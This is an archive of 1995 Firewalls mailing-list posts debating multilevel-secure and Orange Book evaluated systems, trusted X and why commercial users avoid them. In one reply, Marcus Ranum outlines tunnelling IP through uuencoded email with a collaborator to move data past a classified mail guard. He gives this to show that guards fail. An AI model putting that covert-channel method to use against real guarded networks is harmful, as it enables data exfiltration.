> "It's on a B1 system! Therefore it's SECURE!"

[...]

So true. You can make some very convincing arguments for using multi-level security to make a host a lot more secure. I wish I had all the attack plans that were foiled by a firewall built on a B1 OS.

[...]

> Whenever the firewalls-on-evaluated-systems thread starts
> up, lots of folks (most of whom appear, not surprisingly, to be
> selling evaluated systems) start to go down this whole rathole
> of formal methods and quality assurance and so on. The problem
> is that most folks forget that a firewall embodies two COMPLETELY
> DIFFERENT protective relationships:
>
> 1) How the firewall protects itself from attack
> 2) How the firewall protects the network(s) behind it from attack

YES!!!

> You *COULD* make a strong statement about how your firewall
> was using its multilevel security capabilities if you were running
> a labelled network on one side, and your firewall "A1 router" did
> something like stamp a different label on Internet Packets that would
> make them be treated differently. Why aren't more people doing
> this? Because of compatibility and installed base and support
> issues. I've seen grown men start to cry when they even THINK about
> running a labelled network...

I can't even think about it. It is tough enough getting everyone to set up and run their DNS and email configurations correctly. Multi-level network??? The cost of setting it up, let alone maintaining it, let alone getting management to buy into it, is inconceivable.

>
> >I cling to a classic author in the distributed system security field -
> >Morrie Gasser. His model says that you establish secure channels between
> [...]
> >So, I propose that anyone who is serious about mapping their infrastructure
> >across a network (especially a public network like the Internet) needs to
> >use multilevel systems - unless they only have one classification of data
> >that they don't care about.
> >I've never seen such an organization - anyone
> >else?
>
> This is indeed the classical view of distributed system security:
> 1) All data is important to some degree or another
> 2) All data should be separated from all other data
> to some degree or another
> 3) Most organizations don't separate their data at all
> Conclusion: therefore they are wrong
> Corollary: therefore they should use multilevel systems

Conclusion: Most organizations accept the risk of data compromise or destruction as an acceptable cost. A cost that is far below the cost of implementing the 'correct' protections. Or, they have found other solutions that allow them to spread their infrastructure across the internet with an acceptable risk factor.

> The problem is that there are 2 other factors that have to go
> into the equation:
> 1) Everyone wants to run something that is not available
> on a multilevel system

This is only a problem on fascist MLS systems that don't allow user applications. You can have the same problem on non-MLS systems, firewalls or not.

> 2) Managing multilevel systems is harder than managing
> ordinary systems and most people don't have time
> or patience or budget (or all of the above) for
> even that

Managing an MLS system is harder. It takes more planning and execution work. The actual management can be made no worse if the configuration works right.

> Conclusion: multilevel security systems suck

It sucks because it wasn't configured to service the needs of the user community. I worked on a B1 OS evaluation and during that time worked with a group in development to put together an internet firewall. We used the B1 OS because it allowed us to protect the OS from ALL outside attacks and still remain relatively user friendly. ALL is a strong statement. I will qualify it only because we couldn't protect against administrator error or subversion. Early in the design we were looking at compartmentalizing all the various processes from each other (mail, news, users, etc.)
and realized that we would be spending FAR too much time building and maintaining bridges between the processes. We redesigned with the objective of protecting the OS from everyone and then the corporation from the outside.

[...]

> Most of the problems with running multilevel systems could be
> fixed with better user interfaces on top of the security stuff. Security
> need not be onerous; it can be easy if you put some time into your user
> interface. Unfortunately, by the time they have slogged through the
> swamp of orange book, most vendors are ready to throw in the towel
> and making it actually *good* is not an issue. It just meets the spec.

Even with good interfaces there is still the user community to contend with. Unless the benefits of the can be concretely explained it will be an uphill battle to get acceptance and compliance.

Most vendors I know of throw in the towel because they realize that by the time the product is evaluated, it is obsolete. It may sell to the government, but then the cost of maintaining the product for the required number of years may quickly eat up any potential profits from the sales to the government. Profits from sales to commercial markets are even more questionable. Commercial sites are more interested in the DIRECT cost benefits from the evaluated OS. Unless marketing has done a supreme job of research, it hasn't a clue how to sell the MLS features. Thus, commercial profits are low, if any. With low profits, there is no incentive to add features for commercial environments that can be out and out security liabilities in the government environment, thus a catch-22 to spending the time to make the product 'good'.

> "Meeting the spec" is the real reason multilevel systems won't
> take off.

It's too late. Too late for the environments that MLS systems would be used in (the rainbow series can't cope with networks. If you think the TNI does, go read it.) and too late when the product is finished with evaluation.
Of the two evaluated products I've worked on, both were one or two releases behind the current release when the formal evaluation ink dried. Both would have gone into immediate RAMP to get to the current release and both would have skipped one or more commercial releases between RAMP releases. One product never went into RAMP, although the paperwork could have been done in a few weeks to do it, because of business decisions to end the product.

> Systems that are now widely deployed don't
> have any multilevel capability. Hell, most of the computers in the
> world have no notion of "user" or "login" or "file permissions."
> Upgrading an installed base that size is not an option, and for
> networking, multilevel networks require a lot of upgrading to put
> into place.

I think you are overstating the case. It may be there are more DOS or Apple Macs out there that haven't a clue, but you must also consider that all those users of those machines are also very likely to have an account on a unix, vm, mvs or other system that does have the concept. You are correct that integrating those 'D' systems into more secure systems is a daunting task.

[...]

> > In my view, the
> >biggest problems that have prevented this from becoming commonplace have
> >to do with my experience that:
> >
> >1) Most organizations would not know a data classification scheme if it bit
> [...]
> >2) Most organizations are more interested in simply "getting that
> >connectivity going" than they are in doing
> [...]
>
> There's a simpler answer and it may be so simple you just
> happened to overlook it: for 99% of the things that people want to
> do, multilevel secure systems are the last thing on earth they'd
> want to do it ON!

For the simple reason that they don't see how doing it there would help them instead of severely hindering them.

> Most organizations indeed wouldn't know a data classification
> scheme if one fell from the sky covered with diamonds.

I take both of you to task on this one.
Most organizations DO know a data classification system; it is so simple that they overlook its existence. It looks like this: Press Release, Company Confidential, Employee Confidential, Company Proprietary, Company Trade Secret, etc.

> And indeed most
> of them are trying to just connect the heck out of everything. The
> reason is because they are trying to get real work done, and right
> or wrong they are using the platforms and methods that work best for
> them.

Yup. Security comes in 3rd or 4th after function, performance, and other 'more important' issues.

> Whenever I run into a horrendous security nightmare it's
> because it was easier to keep doing things the way that has always
> worked before than to rethink things and do them in a way that might
> make more sense and maybe would be more secure.
>
> That's a *PEOPLE* problem, not a software or hardware
> problem. Throwing multilevel security in isn't going to help that
> one bit. It's just a tool.

Amen! It is a people EDUCATION problem. Until the people involved understand the risks, real or imagined, to the current process and the bottom line monetary cost and benefit, NOTHING is going to happen. Even when they do understand, a decision may be made to do the 'wrong' thing.

JGT
-- 
John G. Thompson jgt10@amdahl.com 1-408-992-2088
Amdahl Corporation, P.O. Box 3470 MS 383, Sunnyvale, CA 94088-3470
[The opinions expressed are MINE. They do not necessarily reflect the policies, procedures, press releases or opinions of the Amdahl Corporation.]
From firewalls-owner Wed Aug 2 01:27:44 1995
From: Marcus J Ranum
Date: Tue, 1 Aug 95 23:23:22 EDT
Message-Id: <9508020323.AA02983@tis.com>
To: firewalls@greatcircle.com
Subject: the ongoing debate..

[Some definitions for the unwary:

Evaluated system: one that has been tested (evaluated) by the NCSC (NSA) at a specific level of security. It appears on the EPL (evaluated products list).

System under evaluation: one that is not yet on the EPL. Note that it may never get evaluated or complete evaluation.

Orange Book: the TCSEC (trusted computing security evaluation criteria) sets out a number of features that are checked in evaluation. Systems are evaluated at different digraphs such as the ones you've seen here:
D = no security (e.g., windows, etc)
C2 = basic features (e.g., UNIX, VMS)
B = more complicated features including labelling
A = *simpler* with often fewer features but with associated formal design, etc

Trusted systems: systems designed with an eye towards the TCSEC

Assurance: the property of knowing that what you *think* is, actually *is*, applied to computer security.

CMW: compartmented mode workstation. A B1 system with some B2 features. Includes labelling but not covert channel analysis or some of the really wizzo stuff.
]

Ray Kaplan writes:
>> The rigor of trusted system design is a market disaster and will
>>never succeed. When you talk to the trust engineers it's like talking to
>>a Freudian psychologist. The logic isn't entirely circular, but if you've
>>bought into it, then it's inescapable.
>
>No argument there. However, I confess to confusion that is beyond this.
>The more security work I do, the less some of it makes sense. On one hand,
>there are people trying to solve hard problems. Many are mired in
>organizational politics, have no resources, and can't seem to even deal
>with the need for a security policy that is actually implemented and
>enforced. On the other hand, the problems that they confront can't be
>solved with the simple technology that they are using. In the face of
>this, I've tried to balance the confusion that I feel by seeking out
>reasonable answers.

They are definitely hard problems. It's one thing to have a system that's full of holes; it's another to have a system that's full of holes and which is used for electronic commerce. It's even another thing still to have a system that's full of holes and which is used for launching H-bombs.

On my machine here (switchblade.iwi.com) I'm not running any security and it's *GREAT*! I'm not even behind a firewall! I refuse to firewall off my own home. :) *BUT* my business papers and processing are all done on a different machine and the only thing you can steal from my server here is a bunch of source code I've mostly posted to the 'net years ago. I believe that is the *TYPICAL* Internet connection and I believe this is a perfectly good approach. It doesn't scale real well, though.

Now, if I were going to make my machine here be a server for electronic funds transfer, you *betcha* I would not be running X on it! And I'd probably strip it down to a state of near uselessness in order to secure it. If my machine were the launch console for H-bombs I'd strip it to a point of beyond uselessness, to secure it!
:)

The point here is that the solutions need to match the problems. IF people who buy their computing solutions do it with that in mind (they don't!) it's not too bad - you buy an ordinary box for ordinary purposes and a CompaqLaunchPro for your H-bomb console and suit the engine to the task. Most people use pliers to drive nails, too; I know I've done it in the past.

Where trusted systems get bad is when word comes from on high that all computing must be secure, and that everything needs to be as secure as the launch console and suddenly nobody can get their work done. At one customer site, we started engineering a firewall and they wanted to make *SURE* (in the sense of assurance) that Web-based viruses could not get in. Suddenly, all the solutions become complex, draconian, expensive -- and WORST OF ALL - you can't use the Netscape browser anymore. I submit to you that any computing system that is a general purpose one (not a dedicated launch console or whatever) that can't run Netscape is going to be a marketing disaster.

> For instance, I find some comfort in strict security
>engineering perspectives that demonstrate:
> 1) That C level TCSEC security features can't keep different
> classifications separated - something else is necessary.
> 2) *Someone* needs to look at designs / code / deployment / operations
> and measure its ability to meet *some* standard.

But, Ray, that's my *point* -- People have been saying this for *years*! The Association of Computer Security Greybeards have been talking about item #2 above for 10, 12 years now and no real progress has been made. That's why it's been a complete rout out there. My take is that the ACSG have been too "hard core" and basically called for "if it's not perfect, don't do it" which caused the market to say, "ok." and go someplace else. Something is necessary, but I don't know what it is (actually I think I do but I'm keeping that idea for myself) and whatever it is, it's not what's currently out there.
The problem with computers is that they're so absolute. In engineering, when you build a bridge, you figure out how strong the materials need to be, multiply by two or three, and away you go. There's nothing you can do like that in computing. The computer security analogy of "engineering overhead" would go something like:
-> First, run C2 security
-> Then, to be sure, shut off all processes except one
-> Lastly, power it off

There's just no way, with computers, to build in the invisible redundancy that you can in a bridge. Or maybe there is? *THAT* is my challenge to the ACSG: make the security an invisible part of the infrastructure, like an engineer can when building a house.

> 1) Most trusted systems are very hard to use. However, I
>believe that
> this has more to do with the difficulty of the problems that
> they address from a strict security engineering perspective.

Yep. They *ARE* hard problems! For the readers of this list who are not steeped in orange, let me give an example. CMWs aren't able to really hit B2 because they don't enforce unique access to devices. Sounds like a small matter? Well, the problem is that the X display and its frame buffer are a nasty problem if you're trying to keep data from here from leaking to there. So, in orange land, you have to make the X server a "trusted" process that itself enforces unique access. Making the X server a trusted process means doing a security analysis (from a data leaking perspective) of X. This is a problem. Can you imagine the cost and effort? Can you imagine the impact on time to market? Yet the orange book dogma is that it must be done or you run no windows. Using a SPARC in console mode is not fun.

Anyhow, I agree with Ray. They are hard problems. Sometimes, the manly thing to do is to say, "WOW! THAT IS A KILLER PROBLEM!" and bag it, try to think of another way to do it, or just give up entirely. That's what most of the world has done with secure computing.
Microsoft has not been hurt by the fact that Windows has no security. I'm surprised they tout it in NT. They sure hide it where nobody will bother to use it, but at least they made it easy(er) to use.

> 2) The only ones who use them are those who are forced (or force
> themselves) to adhere to strict security engineering
> perspectives.

I can think of a number of really crude responses I'd love to make here. :) I know several people who like to be forced to do painful, humiliating, or just plain uncomfortable things. But even the masochists I know couldn't eroticize using a B2 system.

>Bottom line is this "cheap, easy, everybody else is doing it" dynamic can
>be shown to be flawed.

I don't agree. I absolutely do not. The annals of industry are full of large companies that ignored the "cheap, easy, everybody else is doing it" and - they're either out of business or they're no longer large.

>In my view, boiling the mess down to cold
>reasoning reveals the inescapable conclusion that first order security
>engineering principles are simply not being followed by most
>security-related efforts - including most contemporary internetworking
>efforts.

Yep. Fundamental principles can be hard to follow, though. Take one of my favorites: "buy low, sell high." Sometimes it's hard to implement. Sounds easy, doesn't it? Formal computer security is a lot like that. It's full of easy sounding stuff that is insanely hard to do. Covert channels? Great idea. You can spend a million bucks a year thinking about covert channels in your toaster oven and that's not even touching a network.

> By some measures, the *real* absurdity is the notion that you can
>simply connect two disparate security perimeters together with cheap, easy
>solutions and expect everything to be OK.
But the alternatives are:
1) Doing nothing (which is proven to have problems)
2) Doing something formal and very complex (which is proven to take forever, cost a mint, and do something ridiculous like give you an Internet connection that only accepts incoming mail)

That leaves "Do the best you can within cost constraints, time to market, and reasonable effort."

>I ended up at
>lunch with a table of developers from several major vendors that were all
>working on building trusted X for their respective CMWs. Not thinking, I
>made a remark about how easy it must be to grab MIT code and bash it into
>shape. Spoons dropped into soup and there was laughter and choking.
>"Err, should I move to a different table?", I said. Naw, these folks just
>pulled me up short. After regaining his composure, one guy told me that -
>of course - this was their first idea. However, in reading the MIT code,
>he found comments buried deep in an impossibly convoluted case statement
>in X code that said "hey, I know this is ugly, but I'm a graduate student
>and I don't have to care." True or not, it makes the point that building
>something you can trust means starting from scratch. Givens in this
>process seem to include everything you pointed out - and more!

That's a true story. I suspect that millions of dollars have been spent trying to security engineer X. The real answer is: "Under our guidelines, you really can't DO that."

The orange book game seems to be all about trying to get around the orange book. It's this set of simple rules that are hard to implement (at A1 you have to have frictionless disk drives) (just kidding) that basically keep you from doing much of the stuff you want to do like being on a network, writing files, playing web. Trust engineering seems to be the process of saying, "ok, given these constraints, how can we still manage to do it?" The correct answer is: "give up, bag formal security, get an account on AOL" At least that's what a lot of people seem to do.
A number of times I have talked to folks who really should not be on the 'net. I've listened to their firewall requirements, reviewed their designs, and recommended that they cancel the T1, and buy everyone at the facility an account on AOL, a modem at home, and an extended work policy that lets them spend an hour a day at home Internetworking. For some reason, this recommendation shocks people because I guess they think I'm supposed to sell firewalls.

>Nothing against MIT (I don't
>want to malign them in the least), but be it X or Kerberos - you can't even
>expect public domain code to be supportable, let alone trustworthy - except
>by the loosest of business and technical standards.

Ray, Ray, Ray... You're lapsing into orange book think again!! Rewriting everything from scratch only works if you're Rob Pike. And it doesn't work if you need to use other people's products! Whenever I hear someone say the kind of thing you're saying in the paragraph above, I know I am talking with someone who has never had to put a product out under deadline, on 4 different platforms, next week, for customers who want to pay half what you're charging for it. I hate to break it to you, but a lot of commercial code is complete, unmitigated crap, too. You just don't get to see it because it's proprietary. Look at Windows internals and then look at 4.4BSDlite and it's like the difference between finger paintings and a painting by Meissonier. [I am implying that 4.4BSD is really nice stuff, and Windows is, well, a successful commercial product that is cheap, fast, easy.]

>> At this point the trusted system mavens usually raise their
>>hands and say, "Time to market isn't everything! I'd rather have
>>security." The problem is that most of their users would rather have
>>Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc.
>
>Yes, indeed. I propose that this is the problem.
>While trusted system
>mavens are not free from blame, the *real problem* is the notion that you
>can actually run Windows 95, Photoshop, the latest version of MSword,
>BSD4.4, etc without *some* discipline unless you don't care about security.

Thank you for playing. Go tell your commercial customers to bag Windows and guess who they'll bag. It's not a question of not caring about security; it's a question of caring about getting the job done. With 99% of the world that takes top priority. Before you even think about security, make sure it helps get the job done BETTER than the way it's being done now, and if the answer is "it doesn't" then stick with the Government customers who have different success criteria.

>>Look at the evaluated systems out there: they are all obsolete and
>>you can hardly run anything interesting on them. So the mission critical
>>systems get built on foundations of sand (no security) because the
>>secure systems suck too much to contemplate using. Give most users
>>a choice between CompuServe and DOCKMASTER and see which wins.
>
>Indeed. However, to heap all of the blame on DOCKMASTER and its ilk is not
>fair. It's the foundations of sand that most organizations' mission critical
>systems stand on that is the problem!

I'm not heaping blame. I'm just pointing out that DOCKMASTER is literally unusable when compared with, say, Compuserve. They both fulfill the same PURPOSE. If secure systems are going to win they have to be usable. I was just using DOCKMASTER as an example. That it has its adherents is expected. MULTICS was a commercial flop.

>Yes - but, only from the perspective of those who insist on running mission
>critical systems on foundations of sand! I think that a strict security
>engineering-based evaluation of this reveals that *an answer* IS available
>now. The real question is NOT if "the best answer" is available.

"an answer" that is not "the best answer" is going to be a commercial failure.
It may be "the right thing" in some people's eyes but all that means is that you'll have a line of mourners at your funeral.

You keep dancing around it - say it outright. What you're hinting at is that everyone should run multilevel systems and that they should replace their installed base and applications base, eat the retraining cost, and use slow, crufty software that costs 3X what the other stuff costs. Is that what you're saying? If so, you need to have a MUCH stronger case that it'll help my business to *COMPETE* and achieve world marketplace domination. If you think that covert channel analysis was tough, try selling evaluated systems as a way of achieving a productivity edge.

>> More trusted system philosophy: "if you don't use trusted
>>systems you are clearly not concerned about security." That's nonsense.
>
>Ummm, how about if we soften this to say "if you don't use first order
>security engineering principles, you are clearly not concerned about
>security"?

Noooo, how about let's tell the truth: "if you don't use first order security engineering principles it's probably because you had other work to do, that took a higher priority." I am *CONCERNED* about my roof developing a leak. I am not *DOING* anything about it. That doesn't mean I don't care, or that I am clueless about roofing, or that I am an evolutionary dead end.

>[...] we
>can pick and choose the pieces that we like and bend them into shape until
>they DO get usable systems built.

That's exactly what I see happening. The user community has flatly rejected evaluated systems. They picked the pieces they liked. I.e.: none. They're waiting until usable systems get built. In the meantime they have work to do. They WILL trade.

>BTW, I'd sure love to hear the details about exactly how
>your SMG's configuration to run TCP/IP over Email and do NFS works. Or,
>was this a joke?

It wasn't a joke. You simply encapsulate IP packets in uuencoded Email messages, manually create the label and mail it out.
It's *slow* and the latency will kill you, but it will work. There's a tunnel driver for UNIX (Jeff Onions') that sets up a virtual network interface. All packets routing to the interface appear in /dev/tun0 for read. You simply read each packet at an application level, uuencode, and mail. On the other end, you reverse the process. It requires a collaborator. You *can* run TCP/IP over anything that supports the bandwidth, even serial lines, DNS packets, Email...

mjr.

From firewalls-owner Wed Aug 2 01:30:14 1995
Date: Tue, 1 Aug 1995 14:17:18 -0500
To: Marcus J Ranum
From: kaplan@bpa.arizona.edu (Ray Kaplan)
Subject: Re: Firewalls-Digest V4 #453
Cc: Firewalls@GreatCircle.COM

>>The rigor of a
>>trusted system design can (and is regularly) destroyed by misapplication,
>>improper operation, and slip-shod management. This certainly includes
>>firewalls based on this technology.

Marcus J Ranum writes:
> [I'm going to do an evil thing, here, and completely slide by
>the rest of Ray's well-written and thought-out mail, because I think
>that the paragraph above cuts directly to the heart of the matter.
No problem - thanks. And, here I even flubbed the reply to the list by not attributing you (e.g., omitted "Marcus J Ranum writes" in my reply ;) Hey, were it not for the turns that discussions take, this might as well be a book, instead of a eh? The electronic publishing model that I'm birthing has this free flowing style at its core. It's also nice to hear that there still appears to be some sanity left amid my confusion ;)

>I'm not picking on Ray here - but I'm going to use the paragraph above
>to explain and illustrate why the multilevel security philosophy has
>not, and never will, catch on, unless it's reformulated and remarketed.]
>
> The rigor of trusted system design is a market disaster and will
>never succeed. When you talk to the trust engineers it's like talking to
>a Freudian psychologist. The logic isn't entirely circular, but if you've
>bought into it, then it's inescapable.

No argument there. However, I confess to confusion that is beyond this. The more security work I do, the less some of it makes sense. On one hand, there are people trying to solve hard problems. Many are mired in organizational politics, have no resources, and can't seem to even deal with the need for a security policy that is actually implemented and enforced. On the other hand, the problems that they confront can't be solved with the simple technology that they are using. In the face of this, I've tried to balance the confusion that I feel by seeking out reasonable answers.

For instance, I find some comfort in strict security engineering perspectives that demonstrate:
1) That C level TCSEC security features can't keep different classifications separated - something else is necessary.
2) *Someone* needs to look at designs / code / deployment / operations and measure its ability to meet *some* standard.

While there are other security engineering ideas that I find interesting, these illustrate why trusted system ideas are "comfort food" amid my confusion.
Were it not for the fact that I seem to keep coming back to them in the harsh light of retrospect, I'd just keep them on the shelf along with the other cold / flu / "need a boost" remedies.

> The view Ray presents above: "trusted systems are great, but are
>just not being used right" is, in my view, a complete cop-out. The reason
>trusted systems are not being used right is because the way they are
>written they are UNUSABLE. Only someone who is forced to use them would
>even consider touching them!

In general, I agree. Only two points:

1) Most trusted systems are very hard to use. However, I believe that this has more to do with the difficulty of the problems that they address from a strict security engineering perspective.

2) The only ones who use them are those who are forced (or force themselves) to adhere to strict security engineering perspectives.

>How has this happened? Well, it's a number of things:
> 1) Technology moves too fast for formal, dogmatic paradigms
> 2) Market-driven forces will not wait for formal methods
> 3) Time to market is everything - vendors throw everything
> overboard (especially security!) to get it out the
> door on time

Absolutely no argument there. However, I hasten to add that the drivers for your list of causes are all based on a more fundamental dynamic: organizations seem hell bent on going down paths that seem - at first blush - to be the easiest, cheapest... Perhaps only because everyone else is doing it, perhaps only because it's the only apparent way to do things. Bottom line is this "cheap, easy, everybody else is doing it" dynamic can be shown to be flawed. While this idea may be better discussed in a forum like Risks, I believe that there is something practical for firewallers (and other security types) here.
In my view, boiling the mess down to cold reasoning reveals the inescapable conclusion that first order security engineering principles are simply not being followed by most security-related efforts - including most contemporary internetworking efforts. By some measures, the *real* absurdity is the notion that you can simply connect two disparate security perimeters together with cheap, easy solutions and expect everything to be OK.

> What's happened is that in order to meet the insanely complex
>design criteria of trusted systems, vendors have to design systems that
>are obsolete before they even go into evaluation. For example, by the
>time a vendor has rewritten their X server for CMW, it's 2 revs out
>of date, obsolete, buggy, and lacking support for the latest device
>drivers. In a technological market like the one we're in, if your
>product cycle is greater than 8 months-to-market you are TOAST.

Absolutely. However, here is a story that illustrates the more basic problem with all of this. A few years ago I was at one of those "sort of public" security conferences that recently opened its previously classified sessions to the likes of me - you know, places where most attendees share the kinship of clearances and obscure security-related work. I ended up at lunch with a table of developers from several major vendors that were all working on building trusted X for their respective CMWs. Not thinking, I made a remark about how easy it must be to grab MIT code and bash it into shape. Spoons dropped into soup and there was laughter and choking. "Err, should I move to a different table?", I said. Naw, these folks just pulled me up short. After regaining his composure, one guy told me that - of course - this was their first idea. However, in reading the MIT code, he found comments buried deep in an impossibly convoluted case statement in X code that said "hey, I know this is ugly, but I'm a graduate student and I don't have to care."
True or not, it makes the point that building something you can trust means starting from scratch. Givens in this process seem to include everything you pointed out - and more! I just left CyberSAFE (dominant supplier of commercial Kerberos.) After two years of absolute insanity and pain, they actually have a brand new, spanking clean code base that plays with the world while giving them a shot at actually building things on top of it. Nothing against MIT (I don't want to malign them in the least), but be it X or Kerberos - you can't even expect public domain code to be supportable, let alone trustworthy - except by the loosest of business and technical standards.

> At this point the trusted system mavens usually raise their
>hands and say, "Time to market isn't everything! I'd rather have
>security." The problem is that most of their users would rather have
>Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc.

Yes, indeed. I propose that this is the problem. While trusted system mavens are not free from blame, the *real problem* is the notion that you can actually run Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc without *some* discipline unless you don't care about security. All by itself, object linking and embedding is enough to curl my hair - internetworked or not.

>Look at the evaluated systems out there: they are all obsolete and
>you can hardly run anything interesting on them. So the mission critical
>systems get built on foundations of sand (no security) because the
>secure systems suck too much to contemplate using. Give most users
>a choice between CompuServe and DOCKMASTER and see which wins.

Indeed. However, to heap all of the blame on DOCKMASTER and its ilk is not fair. It's the foundations of sand that most organizations' mission critical systems stand on that is the problem!

> The reason trusted systems are mis-deployed is because they
>are terrible for real world use.
>
> Trusted system guys have to stop telling the people who are
>trying to get real work done "nononono! you're using it WRONG!" and
>should spend their time trying to make trusted systems that are easy
>to use, with the security features completely hidden from the user.

Amen! If you run for office, I'll vote for you! Fact of the matter is that if we are ever to have technology that we can trust, we'll have to build in security from the get go. At the risk of setting off a debate about crypto, I hasten to point out that we might never see this given the politics of secrets ;)

> But don't bother - it's too late. The installed base of
>insecure systems and practices is too large to be replaced and
>the demon of backwards compatibility rides all our backs. There
>might have been a time when secure computing could have become
>the norm but now it's too little, too late. I've had the pleasure
>of addressing the Association Of Computer Security Greybeards and
>when I've said this sort of thing their reaction is one of horror.
>"Trustworthy computing is almost a reality! Don't throw the baby
>out with the bathwater!" -- the sad fact is that it's been 10 years
>of effort and all that's come of it is obsolete software that is
>5 years behind the market curve. The baby never even got close
>to the bath.

Yes - but, only from the perspective of those who insist on running mission critical systems on foundations of sand! I think that a strict security engineering-based evaluation of this reveals that *an answer* IS available now. The real question is NOT if "the best answer" is available. Given the politics of defense spending, I'm glad that CMW got out and deployed so we could see its problems BEFORE things got ugly for those who built businesses based on their belief that foundations of sand needed to give way to sound security engineering.
>>The only thing I'd add is that the "make them be treated differently" be
>>stiffened to something like "provably force them to be treated according
>>to the security policy."
>
> Nope. Forget proofs. Come on. The proof guys have been
>ploughing that field for years and have come up empty. The reality
>is that proofs don't scale well with complexity, and in case you
>haven't noticed, every release of every program is 10% larger and
>more complex than the previous. The proofnicks have had their turn
>and it's been a dead loss.

Yep, but I think I may have misled you. The only "proofs" that I require when I do a security assessment is that the security policy is actually implemented in a way that actually supports the business goals that are supposed to underpin the thing in the first place! I'm not a math or crypto or trusted system or defense guy. I'm only asking how a given mix of security features meets the problems that it was deployed to solve. I know, most security status quos are de facto conditions and I freely admit my purist perspective. It's this tension that makes me want to go get a job mowing lawns rather than continue my security career ;) The local McDonalds even has some openings ;) Or, maybe the universe is just playing a joke on me: there ain't ever gonna be no real security. 'course, this might ensure my income for a while ;)

>>>Why aren't more people doing
>>>this? Because of compatibility and installed base and support
>>>issues. I've seen grown men start to cry when they even THINK about
>>>running a labelled network...
>>Indeed. However, those who are serious about this do it - painful as it
>>is. Yoda (Star Wars Jedi Master) was right: "There is only do or not do,
>>there is no try."
>
> More trusted system philosophy: "if you don't use trusted
>systems you are clearly not concerned about security." That's nonsense.
Ummm, how about if we soften this to say "if you don't use first order security engineering principles, you are clearly not concerned about security"? The fact that many think that the only apparent contemporary examples of security engineering principles are found in broken down evaluation systems is a consideration. I *do* know of vast internetworked systems that meet their security policy without a shred of evaluation - save the security engineering principles that were used to design / deploy / manage them.

> Only people with a lot of money and a lot of time can afford to
>bother and they usually do their important computing (where the work
>REALLY gets done!) on PCs at home! Sometimes trusted system think
>reminds me of those guys who'd rather ride a Harley Davidson hardtail
>than anything else in the world. "Sure it's slow, corners like a hippo,
>brakes like a banana on a greased cookie tray, drips oil, and sounds
>like a trainwreck - BUT IT'S A HARLEY" -- "Sure, it's Version 6 UNIX
>with no TCP/IP and no windows and it's slower than mud and I can
>only run it on hardware that is slower than my toaster oven's clock
>chip but it's A1!"

Or, more to the point for me: I love my own 1961 double door microbus. I know it well, I can fix it when it breaks, I know its limitations, and I know just how far I can trust it. When I need something different, I'll go get it (e.g., a big, nasty, 4 wheel drive, five ton truck with a blade for plowing the driveway after a blizzard.) Like waiting for the city to plough the street, one could wait to improve the security of access to outside networks. However, like I'd abandon my microbus for a nasty five ton (that may not even have a heater) to make a path until the pros from city snow removal arrive - I gotta do *something* to open and maintain a trustworthy path to external networks. This has to be done - even in the face of the fact that the five ton is too cumbersome to do a good driveway job in all but the simplest cases.
As the driveway is a mess (even after I hack at it with the 5 ton and its blade), a private network will still be a mess by some standards after it's internetworked. Hey, that Harley is a mess. But, sure beats the hell out of sitting on the side of the road waiting for a more perfect ride to happen by. *Given the choice*, I'll pick the Harley for lots of reasons - despite the fact that it's an old, ugly pile.

> I've been working with a lot of people lately and I haven't
>actually run into anyone in the commercial space IN MY ENTIRE CAREER
>who has been actually deploying trusted system technology. Perhaps
>you have, but from my viewpoint it looks like a total rout.
>
> It's not that people are not serious about trusted systems,
>it's that trusted system designers aren't serious about producing
>useable systems. [Actually, they are, they just haven't succeeded]

Yep, good point. I'd only point out that in the wake of their efforts we can pick and choose the pieces that we like and bend them into shape until they DO get usable systems built.

>> 1) The attempt to invent a new evaluation criteria (in the form of
>> a remake of the U.S. Trusted Computer System Evaluation Criteria
>> (TCSEC) into The Federal Criteria) seems to have failed - the Orange
>> book looks like the status quo for a while.
>
> Yep. The attempt appears (from here) to have been to write
>an envelope criteria that could be stretched to cover ANYTHING so that
>way people could actually get what they want to use in the door. It
>failed but I think it was mostly because the documentation was so
>big and arcane that nobody except the authors had time to read it all. :(

As it seems with most serious efforts to codify basic principles in a way that accommodates everyone, eh? In my view, the only hope is that we can simplify everything back to first order security engineering principles that *can* actually be deployed.
>> 2) It looks like the attempt to have a nice compromise in the form
>> of the mix of security features found in the Compartmented Mode
>> Workstation (CMW) has fallen into disfavor.
>
> That was an interesting effort. From where I stand, the CMW
>effort was an internal revolution against trusted systems, playing
>within the rules. If you look at some of the things in CMWs they
>were anathema to the hardcore trust engineers. My take on it was that
>the users were Sick and Tired of having workstations with no windows.
>CMW seems to have been an elaborate maskirovka to get NFS and X-windows
>into DOD computing.
>
> I suspect it's failed because of time to market. Even the vendors
>have got to hate having to maintain stuff that's 2 revs out of date
>because of the evaluation.

Yep. And, as a result of it, we now have some interesting experience to build on - not all of which has been very nice.

>>Smail is great. However, if
>>you are REALLY going to wall off mail, it takes trusted technology that
>>actually implements a security policy to control the upgrade/down grade
>>issues between compartments/levels.
>
> The SMG (if that's what you're referring to) is a case in
>point. Give me one of the current SMGs and I can configure it to
>run TCP/IP over Email, and do NFS into and out of a classified
>environment. I believe this little loophole is being fixed but the
>whole problem is one of those "emperors new clothes" type deals.
>If you allow ANY large amounts of data in or out, I can run IP
>over it. Period. All you can do is make it slow and expensive. The
>long and short of the story is that it's a wasted effort. If the
>data needs to be absolutely secure: isolate it.

Or, use IP pipes that can actually enforce the security of the two security perimeters that are being connected. Some of the RFC 1108 stuff seems to be as viable as vendor offerings that put DES in their IP kernels for packets.
The trick is that ALL of the channels that connect a security perimeter with another of its ilk must do it in a way that does not break their respective security policy.

>>I propose that this is because the "99% of the things that
>>people want to do" are not given due consideration in the light of a
>>rigorous risk analysis.
>
> Of course not! It's usually considered in terms of time to
>market and productivity gains.
>
>> As examples, consider that object linking and MIME
>>are wonderful new things that everyone wants to do. However, the lack of
>>security in the current designs that are seeing widespread implementation
>>is profound. That is, no one stopped to do a risk analysis. Had they done
>>so, I believe that the rigor of using a trusted system to enforce a
>>security policy that was targeted at reducing these risks would have become
>>common place by now.
>
> Hell no!
>
> Run trusted systems just so I could do MIME? No WAY! I'll
>just do MIME and bash some stuff into the interpreter to make it a
>little better and ride the tiger. That's what 99% of the people out
>there will do.

